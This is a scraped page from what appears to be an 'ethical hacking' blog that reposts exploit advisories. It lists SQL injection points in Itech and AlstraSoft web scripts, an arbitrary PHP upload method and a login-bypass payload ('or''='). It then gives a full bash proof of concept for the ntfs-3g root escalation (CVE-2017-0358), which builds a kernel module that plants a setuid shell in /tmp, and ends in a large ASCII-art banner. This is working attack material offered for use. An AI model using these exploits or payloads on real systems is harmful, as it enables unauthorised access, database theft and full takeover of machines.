# # # # #
# Exploit Title: Itech Inventory Management Software v3.77 - SQL Injection
# Google Dork: N/A
# Date: 02.02.2017
# Vendor Homepage: http://itechscripts.com/
# Software Buy: http://www.itechscripts.com/inventory-management-software/
# Demo: http://inventory.itechscripts.com/
# Version: 3.77
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as employee user
# http://localhost/[PATH]/notice-edit.php?aid=[SQL]
# E.t.c...
# # # # #
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863158114
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# # # # #
# Exploit Title: AlstraSoft Video Share Enterprise v4.72 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/videoshare.htm
# Demo: http://www.alstrahost.com/vs/
# Version: 4.72
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/album.php?UID=[SQL]
# http://localhost/[PATH]/uprofile.php?UID=[SQL]
# http://localhost/[PATH]/gmembers.php?urlkey=[URLKEY]&gid=[SQL]
# http://localhost/[PATH]/channel_detail.php?chid=[SQL]
# # # # #
# # # # #
# Exploit Title: AlstraSoft E-Friends v5.12 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/efriends.htm
# Demo: http://alstrahost.com/friends/
# Version: 5.12
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?mode=forums&act=viewcat&seid=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=[SQL]
# http://localhost/[PATH]/index.php?mode=forums&act=viewforum&cats=131&seid=[SQL]
# # # # #
# # # # #
# Exploit Title: Alstrasoft ProTaxi Enterprise v3.5 Script - Arbitrary File Upload
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/protaxi-uber-clone.htm
# Demo: http://propertycarrots.com/taxi/public/user/signin
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# Register as a passenger member.
# http://localhost/[PATH]/public/user/signup
# My Profile upload photo.php
# http://localhost/[PATH]/public/user/profile
# Right click on the photo to find the .php path.
# http://localhost/[PATH]/public/uploads/....php
# If you upload pictures again .php is deleted.
# # # # #
# # # # #
# Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection
# Google Dork: N/A
# Date: 04.02.2017
# Vendor Homepage: http://www.alstrasoft.com/
# Software Buy: http://www.alstrasoft.com/epay_enterprise.htm
# Demo: http://blizsoft.com/enterprise/
# Version: 5.17
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members/userinfo.htm?id=[SQL]
# http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update
# http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update
# Authentication Bypass :
# http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # #
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358@gmail.com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
char *envp[] = { "HOME=/tmp", NULL };
char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
return 0;
}
void cleanup_module(void) {
printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t
echo << 'EOF'
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+'@@@@@########@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+++'';+'###''#'+'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####'#@@#;;'+@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;:,.``#@@@;`.:@',::'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;`......+;:;':..+:..'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'.;,.,;;;....;,.'.,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';':..':......;.:,,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;..'`.,;:.`;,,.'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;..'..,#;..',.;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++''++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;..':,....,',.'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'::,,::::,,:;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';..;'.,.,.;'..'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:::::::::::::::,;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;';'':,:'';'';;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:::::::::::::::::::;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;'+;';'''''';';;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#,:::::;;;;;;;:::::::::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:;,,;.,'..'.;,,,.;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:::::;;;;;;;;;;;;;;:::,;@@@@@@@@@@@@@@@###@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;.;:,'..'.,,'.';;@@@@@@@@@@@@@@@@@@@@@@@@@@@#::::;;;;;;;;;;;;'';;;;:::#@@@@@@@@@@#'::::::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;:,;::'::+,',':';;@@@@@@@@@@@@@@@@@@@@@@@@@@@::::;;;;;;;';;''''''';;::,'@@@@@@@@@+;;;:;;::;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';;;;;;;;'';;;;;;::#@@@@@@@@@@@@@@@@@@@@@@@@@+,::;;''''';;;''''+''';;;:::#@@@@@@@;;;;;;;;;::@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;::::::;.`.,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@:::;'''''''';;''+''+++;;;;::+'@@@@@';;;;;;;;''+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@',,..,#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#::;'''''''''';;'''' `+'';;:;;:@@@@+';;;;;;'';:#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@++':..'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:;;''''''';'';''''; :+'';;::;@@@@;;;;;;;''+'+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#::.,,#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@':;;'''''''''';''''' ''''';::;@@@+''';;;+#++#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;.,,;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:;;''''''''';;''';':.;+'';;;:;@@@'''':;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##;;..:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:;''++'''''''''';;''''''';;;;'@@@;''',:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;.,:@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;''++''''''''';;;;'''''''''';@@#;'''.:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'...,,;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;''++++'''''''''''''+++++++':@@@''''::+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:,.,;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+:;;''++++''''''''''''''++'''':@@@'''':;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@::''''+++++'''''''''''''''''::@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;'''+'+++''''''''''''''''':;@@@+''';;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;''++'+++++++'''''''''''';:'@@@#''';;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;''+++++++''''''''''''''';:#@@@@''';;:#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;'''+++'+++''+'+''''''''';:#@@@@'+'';:+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;'+++++++++''''''+'''''';:@@@@@+''';;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;''+++++++++'''+'''''''';:@@@@@#''';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;''++++++++''''''''''''';:@@@@@@'''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+'''+++++'+++'''''''''''';:@@@@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++'++'''''''''''';:@@@@@@+''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''+++'+'+'''''''''''''';:@@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++''''''''''''''''';:#@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++''''''''''';''';;#@@@@@#''';;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#'''++++++''''''''''''''';;+@@@@@#'';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#''++++++''''''''';'''''';;;#@@@@''';:;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+++@@@@@@+''++'+++'''''''''';'''''';:'##';';;:;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+'++####';;;'+;';;:'@@@@'''+''+++'''''''''';;''''';:::;;;;;;;;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;;::;;;;;'''''';:+@@@;''+''+++''''';''';;;''''';::;;;;;;'''@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#';;;;:;;;;:;;;;;;;;'''''';:+@#'+'+''++'''''';''';;;;''''';:;;;;''+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;;;;;;;;;:;;;;'''''::#'''''''+++'''';;''';;,;''''';:'''+##@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;;;;;;;;;';;''''';;;,,;''''';;''''''''+''''';;;'''';;;;;;';;;;'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;;''''''+'''''''''';'''''::'''''''+'''';;:;'''';;;;';+';;;+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#;;'';;'';;;'++++++++''''''';;''';''''';''+'''';;,;'++'';;;;;+'';;;#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';'';'::::;::::'#@#+''''''+''';'';'''';''++''';;::;+++'';;;;'++';;;:##@@@@@@@@@@@@@@@@@@@@@@@#'';::;'#@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'''';:::;;;;;;;;:'@@@++';;'+'';''''''';'++''''';,;'+++''';;;'''+':;::+@@@@@@@@@@@@@@@@@@@##';;;;;;;;;::#@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+''::;;;;;'''''';::#@#+'';;'+'';''''';''+''''';;:;'##++'';;;';#+'':;;;'##@@@@@@@@@@@@@@@#;;;;;;;;;;;:;::'@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@':;;;;;;;''++++';;:'@#+';;''''''''';''+''#+';;;;''+##+''';;;;'#++';;;;;;+#@@@@@@@@@@#';;;;''''';;;;;;;::;@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;''++++++'';:'++''''+'';'';''++#@@+';;;;;++##++''''';:+@#+';;;;;;:::::;;;;:;;;;;;'''''''''';;;;::'@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@';;;;;;;;;;'+####+++''';;;;;;'++;'''''#+++@#+''';;'#@@#++'''''';:+@##+'';;;;;:;;;;;;;;;;';''''''''''''',:;;;#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+;;;;;;;'';'+@@@@##++++'+''';;;'+'''''#@@@@@#'''';;'@@@@#@##+'+'';:'#@#+'''';;;;;;;;;;;'''''''''++++++'';';;;'@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;;;;';;;'''+@@@@@@###+++++'+;:;'++'';'+@@@#@+''';;;+@@@@@@@@+++'';;;;'++'''';;;;;;;'''''''''+++#@@@@#++++'';;;@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;''';;'''+#@@@@@@@@###++####+''''+''''''''''''''';;#@@@@@@@@@#++'''''';;;:;;';;;::,;''''++++'';+@@@@@@#'++'';'@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+'''''''#@@@@@@@@@@@########+++++++''''''''''''';;'@@@@@@@@@@@#+''''''''''''''';;;;:::##@@@@@@@@@@@@@@@@@@++'#@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@##+####@@@@@@@@@@@@@@@@@@@@@#'''#++''''''''''''';+@@@@@@@@@@@#++''''+++''''+'''';;;;::+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+''''''''''''+@@@@@@@@@@@@@@###++++++'''+++''';;;;;:+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+''''''''''#@@@@@@@@@@@@@@@@@@###+#+++++++'''';;;;::#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++++#####@@@@@@@@@@@@@@@@@@@@@#+######+++++'';;;;;::@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@+';'+@@@@@@@@@@@@@@@@@@@@@@@@@@@###@@@###+++'''':;;;:'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#++#+##++'';:;;;;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@####@++++''';;;'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#+++'''''#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#####@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@;:##';;;@;';+@@';;;@;;;;'@@':'@';@''+@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@# ' # @ + `@ # @` ,@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@, `@:'. .#` + @ ;#@` `,, ,`@ '` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@; `@@ @@ . @ ` @@ :@ :#@@ :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#, @# @@ `## `.#@` :@ `@'@``` :@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@; @@ @@ : @`` ;@ :@' `@ #` :@@@@@@@@
